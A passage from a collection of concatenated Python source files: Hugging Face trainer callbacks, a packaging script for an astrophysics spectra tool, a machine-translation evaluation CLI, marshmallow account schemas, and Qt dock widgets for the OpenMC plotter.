def __init__(self):
self.training_bar = None
self.prediction_bar = None
def on_train_begin(self, args, state, control, **kwargs):
if state.is_local_process_zero:
self.training_bar = tqdm(total=state.max_steps)
self.current_step = 0
def on_step_end(self, args, state, control, **kwargs):
if state.is_local_process_zero:
self.training_bar.update(state.global_step - self.current_step)
self.current_step = state.global_step
def on_prediction_step(self, args, state, control, eval_dataloader=None, **kwargs):
if state.is_local_process_zero and isinstance(eval_dataloader.dataset, collections.abc.Sized):
if self.prediction_bar is None:
self.prediction_bar = tqdm(total=len(eval_dataloader), leave=self.training_bar is None)
self.prediction_bar.update(1)
def on_evaluate(self, args, state, control, **kwargs):
if state.is_local_process_zero:
if self.prediction_bar is not None:
self.prediction_bar.close()
self.prediction_bar = None
def on_log(self, args, state, control, logs=None, **kwargs):
if state.is_local_process_zero and self.training_bar is not None:
_ = logs.pop("total_flos", None)
self.training_bar.write(str(logs))
def on_train_end(self, args, state, control, **kwargs):
if state.is_local_process_zero:
self.training_bar.close()
self.training_bar = None
class PrinterCallback(TrainerCallback):
"""
A bare [`TrainerCallback`] that just prints the logs.
"""
def on_log(self, args, state, control, logs=None, **kwargs):
_ = logs.pop("total_flos", None)
if state.is_local_process_zero:
print(logs)
class EarlyStoppingCallback(TrainerCallback):
"""
A [`TrainerCallback`] that handles early stopping.
Args:
early_stopping_patience (`int`):
Use with `metric_for_best_model` to stop training when the specified metric worsens for
`early_stopping_patience` evaluation calls.
early_stopping_threshold(`float`, *optional*):
Use with TrainingArguments `metric_for_best_model` and `early_stopping_patience` to denote how
much the specified metric must improve to satisfy early stopping conditions. `
This callback depends on [`TrainingArguments`] argument *load_best_model_at_end* functionality
to set best_metric in [`TrainerState`].
"""
def __init__(self, early_stopping_patience: int = 1, early_stopping_threshold: Optional[float] = 0.0):
self.early_stopping_patience = early_stopping_patience
self.early_stopping_threshold = early_stopping_threshold
# early_stopping_patience_counter denotes the number of times validation metrics failed to improve.
self.early_stopping_patience_counter = 0
def check_metric_value(self, args, state, control, metric_value):
# best_metric is set by code for load_best_model
operator = np.greater if args.greater_is_better else np.less
if state.best_metric is None or (
operator(metric_value, state.best_metric)
and abs(metric_value - state.best_metric) > self.early_stopping_threshold
):
self.early_stopping_patience_counter = 0
else:
self.early_stopping_patience_counter += 1
def on_train_begin(self, args, state, control, **kwargs):
assert args.load_best_model_at_end, "EarlyStoppingCallback requires load_best_model_at_end = True"
assert (
args.metric_for_best_model is not None
), "EarlyStoppingCallback requires metric_for_best_model is defined"
assert (
args.evaluation_strategy != IntervalStrategy.NO
), "EarlyStoppingCallback requires IntervalStrategy of steps or epoch"
def on_evaluate(self, args, state, control, metrics, **kwargs):
metric_to_check = args.metric_for_best_model
if not metric_to_check.startswith("eval_"):
metric_to_check = f"eval_{metric_to_check}"
metric_value = metrics.get(metric_to_check)
if metric_value is None:
logger.warning(
f"early stopping required metric_for_best_model, but did not find {metric_to_check} so early stopping is disabled"
)
return
self.check_metric_value(args, state, control, metric_value)
if self.early_stopping_patience_counter >= self.early_stopping_patience:
control.should_training_stop = True
|
py | 1a4a100f3b0bbef91c9067234912963c19801bde | # coding: utf-8
""" sick, the spectroscopic inference crank """
import os
import re
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
major, minor1, minor2, release, serial = sys.version_info
open_kwargs = {"encoding": "utf-8"} if major >= 3 else {}
def rf(filename):
with open(filename, **open_kwargs) as fp:
contents = fp.read()
return contents
version_regex = re.compile("__version__ = \"(.*?)\"")
contents = rf(os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"sick", "__init__.py"))
version = version_regex.findall(contents)[0]
setup(name="sick",
version=version,
author="Andrew R. Casey",
author_email="[email protected]",
packages=[
"sick",
"sick.models",
"sick.clis",
"sick.specutils"],#"sick.tests"],
url="http://www.github.com/andycasey/sick/",
license="MIT",
description="Infer astrophysical parameters from spectra",
long_description=rf(os.path.join(os.path.dirname(__file__), "README.md")),
install_requires=rf(
os.path.join(os.path.dirname(__file__), "requirements.md")).split("\n"),
entry_points={
"console_scripts": [
"sick-models = sick.clis.models:main",
"sick = sick.clis.run:main"
]
}
)
|
py | 1a4a105b7e3b2e90015dde84367919f1620e23d3 | # Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not
# use this file except in compliance with the License. A copy of the License
# is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
Evaluation CLI.
"""
import argparse
import logging
import sys
from collections import defaultdict
from functools import partial
from typing import Callable, Iterable, Dict, List, Tuple, Optional
import numpy as np
from contrib import sacrebleu, rouge
from . import arguments
from . import constants as C
from . import data_io
from . import utils
from .log import setup_main_logger, log_sockeye_version
logger = setup_main_logger(__name__, file_logging=False)
def raw_corpus_bleu(hypotheses: Iterable[str], references: Iterable[str], offset: Optional[float] = 0.01) -> float:
"""
Simple wrapper around sacreBLEU's BLEU without tokenization and smoothing.
:param hypotheses: Hypotheses stream.
:param references: Reference stream.
:param offset: Smoothing constant.
:return: BLEU score as float between 0 and 1.
"""
return sacrebleu.raw_corpus_bleu(hypotheses, [references], smooth_floor=offset).score / 100.0
def raw_corpus_chrf(hypotheses: Iterable[str], references: Iterable[str]) -> float:
"""
Simple wrapper around sacreBLEU's chrF implementation, without tokenization.
:param hypotheses: Hypotheses stream.
:param references: Reference stream.
:return: chrF score as float between 0 and 1.
"""
return sacrebleu.corpus_chrf(hypotheses, references, order=sacrebleu.CHRF_ORDER, beta=sacrebleu.CHRF_BETA,
remove_whitespace=True)
def raw_corpus_rouge1(hypotheses: Iterable[str], references: Iterable[str]) -> float:
"""
Simple wrapper around ROUGE-1 implementation.
:param hypotheses: Hypotheses stream.
:param references: Reference stream.
:return: ROUGE-1 score as float between 0 and 1.
"""
return rouge.rouge_1(hypotheses, references)
def raw_corpus_rouge2(hypotheses: Iterable[str], references: Iterable[str]) -> float:
"""
Simple wrapper around ROUGE-2 implementation.
:param hypotheses: Hypotheses stream.
:param references: Reference stream.
:return: ROUGE-2 score as float between 0 and 1.
"""
return rouge.rouge_2(hypotheses, references)
def raw_corpus_rougel(hypotheses: Iterable[str], references: Iterable[str]) -> float:
"""
Simple wrapper around ROUGE-1 implementation.
:param hypotheses: Hypotheses stream.
:param references: Reference stream.
:return: ROUGE-L score as float between 0 and 1.
"""
return rouge.rouge_l(hypotheses, references)
def main():
params = argparse.ArgumentParser(description='Evaluate translations by calculating metrics with '
'respect to a reference set. If multiple hypotheses files are given'
'the mean and standard deviation of the metrics are reported.')
arguments.add_evaluate_args(params)
arguments.add_logging_args(params)
args = params.parse_args()
if args.quiet:
logger.setLevel(logging.ERROR)
utils.check_condition(args.offset >= 0, "Offset should be non-negative.")
log_sockeye_version(logger)
logger.info("Command: %s", " ".join(sys.argv))
logger.info("Arguments: %s", args)
references = [' '.join(e) for e in data_io.read_content(args.references)]
all_hypotheses = [[h.strip() for h in hypotheses] for hypotheses in args.hypotheses]
if not args.not_strict:
for hypotheses in all_hypotheses:
utils.check_condition(len(hypotheses) == len(references),
"Number of hypotheses (%d) and references (%d) does not match." % (len(hypotheses),
len(references)))
logger.info("%d hypothesis set(s) | %d hypotheses | %d references",
len(all_hypotheses), len(all_hypotheses[0]), len(references))
metric_info = ["%s\t(s_opt)" % name for name in args.metrics]
logger.info("\t".join(metric_info))
metrics = [] # type: List[Tuple[str, Callable]]
for name in args.metrics:
if name == C.BLEU:
func = partial(raw_corpus_bleu, offset=args.offset)
elif name == C.CHRF:
func = raw_corpus_chrf
elif name == C.ROUGE1:
func = raw_corpus_rouge1
elif name == C.ROUGE2:
func = raw_corpus_rouge2
elif name == C.ROUGEL:
func = raw_corpus_rougel
else:
raise ValueError("Unknown metric %s." % name)
metrics.append((name, func))
if not args.sentence:
scores = defaultdict(list) # type: Dict[str, List[float]]
for hypotheses in all_hypotheses:
for name, metric in metrics:
scores[name].append(metric(hypotheses, references))
_print_mean_std_score(metrics, scores)
else:
for hypotheses in all_hypotheses:
for h, r in zip(hypotheses, references):
scores = defaultdict(list) # type: Dict[str, List[float]]
for name, metric in metrics:
scores[name].append(metric([h], [r]))
_print_mean_std_score(metrics, scores)
def _print_mean_std_score(metrics: List[Tuple[str, Callable]], scores: Dict[str, List[float]]):
scores_mean_std = [] # type: List[str]
for name, _ in metrics:
if len(scores[name]) > 1:
score_mean = np.asscalar(np.mean(scores[name]))
score_std = np.asscalar(np.std(scores[name], ddof=1))
scores_mean_std.append("%.3f\t%.3f" % (score_mean, score_std))
else:
score = scores[name][0]
scores_mean_std.append("%.3f\t(-)" % score)
print("\t".join(scores_mean_std))
if __name__ == '__main__':
main()
|
py | 1a4a10f7e2e87e1bb24c7a8326f9e2298ca9d362 | from marshmallow import fields
from marshmallow_sqlalchemy import (SQLAlchemyAutoSchema, SQLAlchemySchema,
auto_field)
from accounts.db import Account
from .account_address_schema import AccountAddressDetailSchema
from .fields import SmartNested
from .validators import LocaleValidator, TimezoneValidator
class AccountDetailSchema(SQLAlchemyAutoSchema):
addresses = SmartNested(AccountAddressDetailSchema, many=True)
primary_address = SmartNested(AccountAddressDetailSchema, load_default=None)
locale = auto_field(validate=LocaleValidator())
timezone = auto_field(validate=TimezoneValidator())
class Meta:
model = Account
class AccountPartialUpdateSchema(SQLAlchemyAutoSchema):
class Meta:
model = Account
include_fk = True
include_relationships = True
class AccountForeignSchema(SQLAlchemySchema):
pk = auto_field(required=True)
include_addresses = fields.Boolean(load_default=False, load_only=True)
include_primary_address = fields.Boolean(load_default=False, load_only=True)
class Meta:
model = Account
load_instance = False
|
py | 1a4a11cebdd7b139f65e88315e90d25aab1a10fc | from functools import partial
from collections.abc import Iterable
from collections import defaultdict
from PySide2 import QtCore
from PySide2.QtWidgets import (QWidget, QPushButton, QHBoxLayout, QVBoxLayout,
QGroupBox, QFormLayout, QLabel, QLineEdit,
QComboBox, QSpinBox, QDoubleSpinBox, QSizePolicy,
QCheckBox, QDockWidget, QScrollArea, QListWidget,
QListWidgetItem, QTreeWidget, QTreeWidgetItem)
from matplotlib import cm as mcolormaps
import numpy as np
import openmc
from .custom_widgets import HorizontalLine, Expander
from .scientific_spin_box import ScientificDoubleSpinBox
from .plotmodel import (_SCORE_UNITS, _TALLY_VALUES,
_REACTION_UNITS, _SPATIAL_FILTERS)
class PlotterDock(QDockWidget):
"""
Dock widget with common settings for the plotting application
"""
def __init__(self, model, font_metric, parent=None):
super().__init__(parent)
self.model = model
self.font_metric = font_metric
self.main_window = parent
self.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Expanding)
class DomainDock(PlotterDock):
"""
Domain options dock
"""
def __init__(self, model, font_metric, parent=None):
super().__init__(model, font_metric, parent)
self.setAllowedAreas(QtCore.Qt.LeftDockWidgetArea)
# Create Controls
self._createOriginBox()
self._createOptionsBox()
self._createResolutionBox()
# Create submit button
self.applyButton = QPushButton("Apply Changes")
# Mac bug fix
self.applyButton.setMinimumHeight(self.font_metric.height() * 1.6)
self.applyButton.clicked.connect(self.main_window.applyChanges)
# Create Zoom box
self.zoomBox = QSpinBox()
self.zoomBox.setSuffix(' %')
self.zoomBox.setRange(25, 2000)
self.zoomBox.setValue(100)
self.zoomBox.setSingleStep(25)
self.zoomBox.valueChanged.connect(self.main_window.editZoom)
self.zoomLayout = QHBoxLayout()
self.zoomLayout.addWidget(QLabel('Zoom:'))
self.zoomLayout.addWidget(self.zoomBox)
self.zoomLayout.setContentsMargins(0, 0, 0, 0)
self.zoomWidget = QWidget()
self.zoomWidget.setLayout(self.zoomLayout)
# Create Layout
self.dockLayout = QVBoxLayout()
self.dockLayout.addWidget(QLabel("Geometry/Properties"))
self.dockLayout.addWidget(HorizontalLine())
self.dockLayout.addWidget(self.originGroupBox)
self.dockLayout.addWidget(self.optionsGroupBox)
self.dockLayout.addWidget(self.resGroupBox)
self.dockLayout.addWidget(HorizontalLine())
self.dockLayout.addWidget(self.zoomWidget)
self.dockLayout.addWidget(HorizontalLine())
self.dockLayout.addStretch()
self.dockLayout.addWidget(self.applyButton)
self.dockLayout.addWidget(HorizontalLine())
self.optionsWidget = QWidget()
self.optionsWidget.setLayout(self.dockLayout)
self.setWidget(self.optionsWidget)
def _createOriginBox(self):
# X Origin
self.xOrBox = QDoubleSpinBox()
self.xOrBox.setDecimals(9)
self.xOrBox.setRange(-99999, 99999)
xbox_connector = partial(self.main_window.editSingleOrigin,
dimension=0)
self.xOrBox.valueChanged.connect(xbox_connector)
# Y Origin
self.yOrBox = QDoubleSpinBox()
self.yOrBox.setDecimals(9)
self.yOrBox.setRange(-99999, 99999)
ybox_connector = partial(self.main_window.editSingleOrigin,
dimension=1)
self.yOrBox.valueChanged.connect(ybox_connector)
# Z Origin
self.zOrBox = QDoubleSpinBox()
self.zOrBox.setDecimals(9)
self.zOrBox.setRange(-99999, 99999)
zbox_connector = partial(self.main_window.editSingleOrigin,
dimension=2)
self.zOrBox.valueChanged.connect(zbox_connector)
# Origin Form Layout
self.orLayout = QFormLayout()
self.orLayout.addRow('X:', self.xOrBox)
self.orLayout.addRow('Y:', self.yOrBox)
self.orLayout.addRow('Z:', self.zOrBox)
self.orLayout.setLabelAlignment(QtCore.Qt.AlignLeft)
self.orLayout.setFieldGrowthPolicy(QFormLayout.AllNonFixedFieldsGrow)
# Origin Group Box
self.originGroupBox = QGroupBox('Origin')
self.originGroupBox.setLayout(self.orLayout)
def _createOptionsBox(self):
# Width
self.widthBox = QDoubleSpinBox(self)
self.widthBox.setRange(.1, 99999)
self.widthBox.setDecimals(9)
self.widthBox.valueChanged.connect(self.main_window.editWidth)
# Height
self.heightBox = QDoubleSpinBox(self)
self.heightBox.setRange(.1, 99999)
self.heightBox.setDecimals(9)
self.heightBox.valueChanged.connect(self.main_window.editHeight)
# ColorBy
self.colorbyBox = QComboBox(self)
self.colorbyBox.addItem("material")
self.colorbyBox.addItem("cell")
self.colorbyBox.addItem("temperature")
self.colorbyBox.addItem("density")
self.colorbyBox.currentTextChanged[str].connect(
self.main_window.editColorBy)
# Universe level (applies to cell coloring only)
self.universeLevelBox = QComboBox(self)
self.universeLevelBox.addItem('all')
for i in range(self.model.max_universe_levels):
self.universeLevelBox.addItem(str(i))
self.universeLevelBox.currentTextChanged[str].connect(
self.main_window.editUniverseLevel)
# Alpha
self.domainAlphaBox = QDoubleSpinBox(self)
self.domainAlphaBox.setValue(self.model.activeView.domainAlpha)
self.domainAlphaBox.setSingleStep(0.05)
self.domainAlphaBox.setDecimals(2)
self.domainAlphaBox.setRange(0.0, 1.0)
self.domainAlphaBox.valueChanged.connect(self.main_window.editPlotAlpha)
# Visibility
self.visibilityBox = QCheckBox(self)
self.visibilityBox.stateChanged.connect(
self.main_window.editPlotVisibility)
# Outlines
self.outlinesBox = QCheckBox(self)
self.outlinesBox.stateChanged.connect(self.main_window.toggleOutlines)
# Basis
self.basisBox = QComboBox(self)
self.basisBox.addItem("xy")
self.basisBox.addItem("xz")
self.basisBox.addItem("yz")
self.basisBox.currentTextChanged.connect(self.main_window.editBasis)
# Advanced Color Options
self.colorOptionsButton = QPushButton('Color Options...')
self.colorOptionsButton.setMinimumHeight(self.font_metric.height() * 1.6)
self.colorOptionsButton.clicked.connect(self.main_window.showColorDialog)
# Options Form Layout
self.opLayout = QFormLayout()
self.opLayout.addRow('Width:', self.widthBox)
self.opLayout.addRow('Height:', self.heightBox)
self.opLayout.addRow('Basis:', self.basisBox)
self.opLayout.addRow('Color By:', self.colorbyBox)
self.opLayout.addRow('Universe Level:', self.universeLevelBox)
self.opLayout.addRow('Plot alpha:', self.domainAlphaBox)
self.opLayout.addRow('Visible:', self.visibilityBox)
self.opLayout.addRow('Outlines:', self.outlinesBox)
self.opLayout.addRow(self.colorOptionsButton)
self.opLayout.setLabelAlignment(QtCore.Qt.AlignLeft)
self.opLayout.setFieldGrowthPolicy(QFormLayout.AllNonFixedFieldsGrow)
# Options Group Box
self.optionsGroupBox = QGroupBox('Options')
self.optionsGroupBox.setLayout(self.opLayout)
def _createResolutionBox(self):
# Horizontal Resolution
self.hResBox = QSpinBox(self)
self.hResBox.setRange(1, 99999)
self.hResBox.setSingleStep(25)
self.hResBox.setSuffix(' px')
self.hResBox.valueChanged.connect(self.main_window.editHRes)
# Vertical Resolution
self.vResLabel = QLabel('Pixel Height:')
self.vResBox = QSpinBox(self)
self.vResBox.setRange(1, 99999)
self.vResBox.setSingleStep(25)
self.vResBox.setSuffix(' px')
self.vResBox.valueChanged.connect(self.main_window.editVRes)
# Ratio checkbox
self.ratioCheck = QCheckBox("Fixed Aspect Ratio", self)
self.ratioCheck.stateChanged.connect(self.main_window.toggleAspectLock)
# Resolution Form Layout
self.resLayout = QFormLayout()
self.resLayout.addRow(self.ratioCheck)
self.resLayout.addRow('Pixel Width:', self.hResBox)
self.resLayout.addRow(self.vResLabel, self.vResBox)
self.resLayout.setLabelAlignment(QtCore.Qt.AlignLeft)
self.resLayout.setFieldGrowthPolicy(QFormLayout.AllNonFixedFieldsGrow)
# Resolution Group Box
self.resGroupBox = QGroupBox("Resolution")
self.resGroupBox.setLayout(self.resLayout)
def updateDock(self):
self.updateOrigin()
self.updateWidth()
self.updateHeight()
self.updateColorBy()
self.updateUniverseLevel()
self.updatePlotAlpha()
self.updatePlotVisibility()
self.updateOutlines()
self.updateBasis()
self.updateAspectLock()
self.updateHRes()
self.updateVRes()
def updateOrigin(self):
self.xOrBox.setValue(self.model.activeView.origin[0])
self.yOrBox.setValue(self.model.activeView.origin[1])
self.zOrBox.setValue(self.model.activeView.origin[2])
def updateWidth(self):
self.widthBox.setValue(self.model.activeView.width)
def updateHeight(self):
self.heightBox.setValue(self.model.activeView.height)
def updateColorBy(self):
self.colorbyBox.setCurrentText(self.model.activeView.colorby)
if self.model.activeView.colorby != 'cell':
self.universeLevelBox.setEnabled(False)
else:
self.universeLevelBox.setEnabled(True)
def updateUniverseLevel(self):
self.universeLevelBox.setCurrentIndex(self.model.activeView.level + 1)
def updatePlotAlpha(self):
self.domainAlphaBox.setValue(self.model.activeView.domainAlpha)
def updatePlotVisibility(self):
self.visibilityBox.setChecked(self.model.activeView.domainVisible)
def updateOutlines(self):
self.outlinesBox.setChecked(self.model.activeView.outlines)
def updateBasis(self):
self.basisBox.setCurrentText(self.model.activeView.basis)
def updateAspectLock(self):
aspect_lock = bool(self.model.activeView.aspectLock)
self.ratioCheck.setChecked(aspect_lock)
self.vResBox.setDisabled(aspect_lock)
self.vResLabel.setDisabled(aspect_lock)
def updateHRes(self):
self.hResBox.setValue(self.model.activeView.h_res)
def updateVRes(self):
self.vResBox.setValue(self.model.activeView.v_res)
def revertToCurrent(self):
cv = self.model.currentView
self.xOrBox.setValue(cv.origin[0])
self.yOrBox.setValue(cv.origin[1])
self.zOrBox.setValue(cv.origin[2])
self.widthBox.setValue(cv.width)
self.heightBox.setValue(cv.height)
def resizeEvent(self, event):
self.main_window.resizeEvent(event)
hideEvent = showEvent = moveEvent = resizeEvent
class TallyDock(PlotterDock):
def __init__(self, model, font_metric, parent=None):
super().__init__(model, font_metric, parent)
self.setAllowedAreas(QtCore.Qt.RightDockWidgetArea)
# Dock maps for tally information
self.tally_map = {}
self.filter_map = {}
self.score_map = {}
self.nuclide_map = {}
# Tally selector
self.tallySelectorLayout = QFormLayout()
self.tallySelector = QComboBox(self)
self.tallySelector.currentTextChanged[str].connect(
self.main_window.editSelectedTally)
self.tallySelectorLayout.addRow(self.tallySelector)
self.tallySelectorLayout.setLabelAlignment(QtCore.Qt.AlignLeft)
self.tallySelectorLayout.setFieldGrowthPolicy(
QFormLayout.AllNonFixedFieldsGrow)
# Add selector to its own box
self.tallyGroupBox = QGroupBox('Selected Tally')
self.tallyGroupBox.setLayout(self.tallySelectorLayout)
# Create submit button
self.applyButton = QPushButton("Apply Changes")
self.applyButton.setMinimumHeight(self.font_metric.height() * 1.6)
self.applyButton.clicked.connect(self.main_window.applyChanges)
# Color options section
self.tallyColorForm = ColorForm(self.model, self.main_window, 'tally')
self.scoresGroupBox = Expander(title="Scores:")
self.scoresListWidget = QListWidget()
self.nuclidesListWidget = QListWidget()
# Main layout
self.dockLayout = QVBoxLayout()
self.dockLayout.addWidget(QLabel("Tallies"))
self.dockLayout.addWidget(HorizontalLine())
self.dockLayout.addWidget(self.tallyGroupBox)
self.dockLayout.addStretch()
self.dockLayout.addWidget(HorizontalLine())
self.dockLayout.addWidget(self.tallyColorForm)
self.dockLayout.addWidget(HorizontalLine())
self.dockLayout.addWidget(self.applyButton)
# Create widget for dock and apply main layout
self.scroll = QScrollArea()
self.scroll.setWidgetResizable(True)
self.widget = QWidget()
self.widget.setLayout(self.dockLayout)
self.scroll.setWidget(self.widget)
self.setWidget(self.scroll)
def _createFilterTree(self, spatial_filters):
av = self.model.activeView
tally = self.model.statepoint.tallies[av.selectedTally]
filters = tally.filters
# create a tree for the filters
self.treeLayout = QVBoxLayout()
self.filterTree = QTreeWidget()
self.treeLayout.addWidget(self.filterTree)
self.treeExpander = Expander("Filters:", layout=self.treeLayout)
self.treeExpander.expand() # start with filters expanded
header = QTreeWidgetItem(["Filters"])
self.filterTree.setHeaderItem(header)
self.filterTree.setItemHidden(header, True)
self.filterTree.setColumnCount(1)
self.filterTree.itemChanged.connect(self.updateFilters)
self.filter_map = {}
self.bin_map = {}
for tally_filter in filters:
filter_label = str(type(tally_filter)).split(".")[-1][:-2]
filter_item = QTreeWidgetItem(self.filterTree, (filter_label,))
self.filter_map[tally_filter] = filter_item
# make checkable
if not spatial_filters:
filter_item.setFlags(QtCore.Qt.ItemIsUserCheckable)
filter_item.setToolTip(0, "Only tallies with spatial filters are viewable.")
else:
filter_item.setFlags(filter_item.flags() | QtCore.Qt.ItemIsTristate | QtCore.Qt.ItemIsUserCheckable)
filter_item.setCheckState(0, QtCore.Qt.Unchecked)
# all mesh bins are selected by default and not shown in the dock
if isinstance(tally_filter, openmc.MeshFilter):
filter_item.setCheckState(0, QtCore.Qt.Checked)
filter_item.setFlags(QtCore.Qt.ItemIsUserCheckable)
filter_item.setToolTip(0, "All Mesh bins are selected automatically")
continue
def _bin_sort_val(bin):
if isinstance(bin, Iterable) and all([isinstance(val, float) for val in bin]):
return np.sum(bin)
else:
return bin
for bin in sorted(tally_filter.bins, key=_bin_sort_val):
item = QTreeWidgetItem(filter_item, [str(bin),])
if not spatial_filters:
item.setFlags(QtCore.Qt.ItemIsUserCheckable)
item.setToolTip(0, "Only tallies with spatial filters are viewable.")
else:
item.setFlags(item.flags() | QtCore.Qt.ItemIsUserCheckable)
item.setCheckState(0, QtCore.Qt.Unchecked)
bin = bin if not isinstance(bin, Iterable) else tuple(bin)
self.bin_map[tally_filter, bin] = item
# start with all filters selected if spatial filters are present
if spatial_filters:
filter_item.setCheckState(0, QtCore.Qt.Checked)
def selectFromModel(self):
cv = self.model.currentView
self.selectedTally(cv.selectedTally)
def selectTally(self, tally_label=None):
# using active view to populate tally options live
av = self.model.activeView
# reset form layout
for i in reversed(range(self.tallySelectorLayout.count())):
self.tallySelectorLayout.itemAt(i).widget().setParent(None)
# always re-add the tally selector to the layout
self.tallySelectorLayout.addRow(self.tallySelector)
self.tallySelectorLayout.addRow(HorizontalLine())
if tally_label is None or tally_label == "None" or tally_label == "":
av.selectedTally = None
self.score_map = None
self.nuclide_map = None
self.filter_map = None
av.tallyValue = "Mean"
else:
# get the tally
tally = self.model.statepoint.tallies[av.selectedTally]
# populate filters
filter_types = {type(f) for f in tally.filters}
spatial_filters = bool(filter_types.intersection(_SPATIAL_FILTERS))
if not spatial_filters:
self.filter_description = QLabel("(No Spatial Filters)")
self.tallySelectorLayout.addRow(self.filter_description)
self._createFilterTree(spatial_filters)
self.tallySelectorLayout.addRow(self.treeExpander)
self.tallySelectorLayout.addRow(HorizontalLine())
# value selection
self.tallySelectorLayout.addRow(QLabel("Value:"))
self.valueBox = QComboBox(self)
self.values = tuple(_TALLY_VALUES.keys())
for value in self.values:
self.valueBox.addItem(value)
self.tallySelectorLayout.addRow(self.valueBox)
self.valueBox.currentTextChanged[str].connect(
self.main_window.editTallyValue)
self.updateTallyValue()
if not spatial_filters:
self.valueBox.setEnabled(False)
self.valueBox.setToolTip("Only tallies with spatial filters are viewable.")
# scores
self.score_map = {}
self.scoresListWidget.itemClicked.connect(
self.main_window.updateScores)
self.score_map.clear()
self.scoresListWidget.clear()
sorted_scores = sorted(tally.scores)
# always put total first if present
if 'total' in sorted_scores:
idx = sorted_scores.index('total')
sorted_scores.insert(0, sorted_scores.pop(idx))
for score in sorted_scores:
ql = QListWidgetItem()
ql.setText(score.capitalize())
ql.setCheckState(QtCore.Qt.Unchecked)
if not spatial_filters:
ql.setFlags(QtCore.Qt.ItemIsUserCheckable)
else:
ql.setFlags(ql.flags() | QtCore.Qt.ItemIsUserCheckable)
ql.setFlags(ql.flags() & ~QtCore.Qt.ItemIsSelectable)
self.score_map[score] = ql
self.scoresListWidget.addItem(ql)
# select the first score item by default
for item in self.score_map.values():
item.setCheckState(QtCore.Qt.Checked)
break
self.updateScores()
self.scoresGroupBoxLayout = QVBoxLayout()
self.scoresGroupBoxLayout.addWidget(self.scoresListWidget)
self.scoresGroupBox = Expander("Scores:", layout=self.scoresGroupBoxLayout)
self.tallySelectorLayout.addRow(self.scoresGroupBox)
# nuclides
self.nuclide_map = {}
self.nuclidesListWidget.itemClicked.connect(self.main_window.updateNuclides)
self.nuclide_map.clear()
self.nuclidesListWidget.clear()
sorted_nuclides = sorted(tally.nuclides)
# always put total at the top
if 'total' in sorted_nuclides:
idx = sorted_nuclides.index('total')
sorted_nuclides.insert(0, sorted_nuclides.pop(idx))
for nuclide in sorted_nuclides:
ql = QListWidgetItem()
ql.setText(nuclide.capitalize())
ql.setCheckState(QtCore.Qt.Unchecked)
if not spatial_filters:
ql.setFlags(QtCore.Qt.ItemIsUserCheckable)
else:
ql.setFlags(ql.flags() | QtCore.Qt.ItemIsUserCheckable)
ql.setFlags(ql.flags() & ~QtCore.Qt.ItemIsSelectable)
self.nuclide_map[nuclide] = ql
self.nuclidesListWidget.addItem(ql)
# select the first nuclide item by default
for item in self.nuclide_map.values():
item.setCheckState(QtCore.Qt.Checked)
break
self.updateNuclides()
self.nuclidesGroupBoxLayout = QVBoxLayout()
self.nuclidesGroupBoxLayout.addWidget(self.nuclidesListWidget)
self.nuclidesGroupBox = Expander("Nuclides:", layout=self.nuclidesGroupBoxLayout)
self.tallySelectorLayout.addRow(self.nuclidesGroupBox)
def updateMinMax(self):
self.tallyColorForm.updateMinMax()
def updateTallyValue(self):
cv = self.model.currentView
idx = self.valueBox.findText(cv.tallyValue)
self.valueBox.setCurrentIndex(idx)
def updateSelectedTally(self):
cv = self.model.currentView
idx = 0
if cv.selectedTally:
idx = self.tallySelector.findData(cv.selectedTally)
self.tallySelector.setCurrentIndex(idx)
def updateFilters(self):
applied_filters = defaultdict(tuple)
for f, f_item in self.filter_map.items():
if type(f) == openmc.MeshFilter:
continue
filter_checked = f_item.checkState(0)
if filter_checked != QtCore.Qt.Unchecked:
selected_bins = []
for idx, b in enumerate(f.bins):
b = b if not isinstance(b, Iterable) else tuple(b)
bin_checked = self.bin_map[(f, b)].checkState(0)
if bin_checked == QtCore.Qt.Checked:
selected_bins.append(idx)
applied_filters[f] = tuple(selected_bins)
self.model.appliedFilters = applied_filters
def updateScores(self):
applied_scores = []
for score, score_box in self.score_map.items():
if score_box.checkState() == QtCore.Qt.CheckState.Checked:
applied_scores.append(score)
self.model.appliedScores = tuple(applied_scores)
if not applied_scores:
# if no scores are selected, enable all scores again
for score, score_box in self.score_map.items():
sunits = _SCORE_UNITS.get(score, _REACTION_UNITS)
empty_item = QListWidgetItem()
score_box.setFlags(empty_item.flags() | QtCore.Qt.ItemIsUserCheckable)
score_box.setFlags(empty_item.flags() & ~QtCore.Qt.ItemIsSelectable)
elif 'total' in applied_scores:
self.model.appliedScores = ('total',)
# if total is selected, disable all other scores
for score, score_box in self.score_map.items():
if score != 'total':
score_box.setFlags(QtCore.Qt.ItemIsUserCheckable)
score_box.setToolTip("De-select 'total' to enable other scores")
else:
# get units of applied scores
selected_units = _SCORE_UNITS.get(applied_scores[0], _REACTION_UNITS)
# disable scores with incompatible units
for score, score_box in self.score_map.items():
sunits = _SCORE_UNITS.get(score, _REACTION_UNITS)
if sunits != selected_units:
score_box.setFlags(QtCore.Qt.ItemIsUserCheckable)
score_box.setToolTip("Score is incompatible with currently selected scores")
else:
score_box.setFlags(score_box.flags() | QtCore.Qt.ItemIsUserCheckable)
score_box.setFlags(score_box.flags() & ~QtCore.Qt.ItemIsSelectable)
def updateNuclides(self):
applied_nuclides = []
for nuclide, nuclide_box in self.nuclide_map.items():
if nuclide_box.checkState() == QtCore.Qt.CheckState.Checked:
applied_nuclides.append(nuclide)
self.model.appliedNuclides = tuple(applied_nuclides)
if 'total' in applied_nuclides:
self.model.appliedNuclides = ['total',]
for nuclide, nuclide_box in self.nuclide_map.items():
if nuclide != 'total':
nuclide_box.setFlags(QtCore.Qt.ItemIsUserCheckable)
nuclide_box.setToolTip("De-select 'total' to enable other nuclides")
elif not applied_nuclides:
# if no nuclides are selected, enable all nuclides again
for nuclide, nuclide_box in self.nuclide_map.items():
empty_item = QListWidgetItem()
nuclide_box.setFlags(empty_item.flags() | QtCore.Qt.ItemIsUserCheckable)
nuclide_box.setFlags(empty_item.flags() & ~QtCore.Qt.ItemIsSelectable)
def update(self):
# update the color form
self.tallyColorForm.update()
if self.model.statepoint:
self.tallySelector.clear()
self.tallySelector.setEnabled(True)
